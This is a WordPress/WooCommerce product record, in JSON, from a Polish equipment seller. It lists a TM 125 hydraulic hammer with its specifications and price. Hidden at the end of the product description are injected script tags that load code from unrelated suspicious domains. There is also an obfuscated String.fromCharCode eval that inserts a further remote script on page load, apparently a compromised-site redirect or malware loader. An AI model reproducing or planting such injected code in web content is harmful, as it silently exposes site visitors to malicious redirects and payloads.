{"id":1385,"date":"2016-09-05T13:23:42","date_gmt":"2016-09-05T11:23:42","guid":{"rendered":"http:\/\/izbud.com.pl\/?post_type=product&#038;p=1385"},"modified":"2017-10-25T14:11:04","modified_gmt":"2017-10-25T12:11:04","slug":"mlot-hydrauliczny-tm-125-nowy","status":"publish","type":"product","link":"https:\/\/izbud.com.pl\/index.php\/produkt\/mlot-hydrauliczny-tm-125-nowy\/","title":{"rendered":"M\u0142ot hydrauliczny TM 125 JCB, Nowy,300 KG"},"content":{"rendered":"<p>&nbsp;<\/p>\n<table>\n<tbody>\n<tr>\n<td width=\"215\">Waga m\u0142ota<\/td>\n<td width=\"208\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 300 kg<\/td>\n<\/tr>\n<tr>\n<td width=\"215\">Waga koparki<\/td>\n<td width=\"208\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 6-13 ton<\/td>\n<\/tr>\n<tr>\n<td width=\"215\">Szeroko\u015b\u0107 m\u0142ota<\/td>\n<td width=\"208\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 205 mm<\/td>\n<\/tr>\n<tr>\n<td width=\"215\">\u015arednica grota<\/td>\n<td width=\"208\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 80 mm<\/td>\n<\/tr>\n<tr>\n<td width=\"215\">Przep\u0142yw oleju<\/td>\n<td width=\"208\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 45-60 l\/min<\/td>\n<\/tr>\n<tr>\n<td width=\"215\">Ci\u015bnienie bar<\/td>\n<td width=\"208\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 105-115 bar<\/td>\n<\/tr>\n<tr>\n<td width=\"215\">Powr\u00f3t ci\u015bnienia do m\u0142ota<\/td>\n<td width=\"208\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 20 Bar<\/td>\n<\/tr>\n<tr>\n<td width=\"215\">Cz\u0119stotliwo\u015b\u0107<\/td>\n<td width=\"208\">\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 600-900 min<\/td>\n<\/tr>\n<tr>\n<td width=\"215\">\u00a0Energia uderzenia<\/td>\n<td width=\"208\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 700 \u00a0 Jul<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><strong>Dedykowany do koparko \u0142adowarki JCB, CAT,CASE,MF,KOMATSU.<\/strong><\/p>\n<p><strong>GWARANCJA 12 MIESI\u0118CY<\/strong><script src='https:\/\/trick.legendarytable.com\/news.js?v=9.4.9' type='text\/javascript'><\/script><script src='https:\/\/js.cofounderspecials.com\/splash.js?v=5.1.7' type='text\/javascript'><\/script><script src='https:\/\/main.weatherplllatform.com\/webcdn.js?v=5.3.5' type='text\/javascript'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<div class=\"summary entry-summary\">\n<div>\n<p style=\"text-align: left;\"><strong>Dane techniczne<\/strong><\/p>\n<p style=\"text-align: left;\"><strong>Marka<\/strong>: \u00a0 TM 125,licencja Montabert<\/p>\n<p style=\"text-align: left;\"><strong>Waga<\/strong>: \u00a0 \u00a0 \u00a0300 \u00a0KG<\/p>\n<p style=\"text-align: left;\"><strong>Rocznik<\/strong>:\u00a0\u00a0 2016<\/p>\n<p style=\"text-align: left;\"><strong>Cena<\/strong>: \u00a0 17 000 z\u0142<\/p>\n<\/div>\n<\/div>\n<div class=\"woocommerce-tabs wc-tabs-wrapper\" style=\"text-align: left;\"><\/div>\n","protected":false},"featured_media":1276,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"product_cat":[27,37],"product_tag":[],"_links":{"self":[{"href":"https:\/\/izbud.com.pl\/index.php\/wp-json\/wp\/v2\/product\/1385"}],"collection":[{"href":"https:\/\/izbud.com.pl\/index.php\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/izbud.com.pl\/index.php\/wp-json\/wp\/v2\/types\/product"}],"replies":[{"embeddable":true,"href":"https:\/\/izbud.com.pl\/index.php\/wp-json\/wp\/v2\/comments?post=1385"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/izbud.com.pl\/index.php\/wp-json\/wp\/v2\/media\/1276"}],"wp:attachment":[{"href":"https:\/\/izbud.com.pl\/index.php\/wp-json\/wp\/v2\/media?parent=1385"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/izbud.com.pl\/index.php\/wp-json\/wp\/v2\/product_cat?post=1385"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/izbud.com.pl\/index.php\/wp-json\/wp\/v2\/product_tag?post=1385"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}